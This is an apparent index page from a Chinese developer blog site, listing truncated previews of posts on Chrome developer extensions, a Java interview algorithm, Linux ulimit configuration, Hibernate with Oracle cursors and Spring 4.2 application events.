    Firebug:不用多介绍了吧https://chrome.google.com/webstore/detail/bmagokdooijbeehmkpknfglimnifench ChromeSnifferPlus:Chrome 探测器,可以探测正在使用的开源软件或者 js 类库https://chrome.google.com/webstore/detail/chrome-sniffer-pl
  • 算法机试题 李亚飞 java算法机试题
           在面试机试时,遇到一个算法题,当时没能写出来,最后是同学帮忙解决的。        这道题大致意思是:输入一个数,比如4,。这时会输出:           &n
  • 正确配置Linux系统ulimit值 字符串 ulimit
    在Linux下面部 署应用的时候,有时候会遇上Socket/File: Can’t open so many files的问题;这个值也会影响服务器的最大并发数,其实Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用 其实很容易就达到这个数量。下面说的是,如何通过正解配置来改正这个系统默认值。因为这个问题是我配置Nginx+php5时遇到了,所以我将这篇归纳进
  • hibernate调用返回游标的存储过程 Supanccy2013 javaDAOoracleHibernatejdbc
    注:原创作品,转载请注明出处。     上篇博文介绍的是hibernate调用返回单值的存储过程,本片博文说的是hibernate调用返回游标的存储过程。     此此扁博文的存储过程的功能相当于是jdbc调用select 的作用。 1,创建oracle中的包,并在该包中创建的游标类型。 ---创建oracle的程
  • Spring 4.2新特性-更简单的Application Event wiselyman application
    1.1 Application Event Spring 4.1的写法请参考10点睛Spring4.1-Application Event 请对比10点睛Spring4.1-Application Event 使用一个@EventListener取代了实现ApplicationListener接口,使耦合度降低; 1.2 示例 包依赖 <p
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他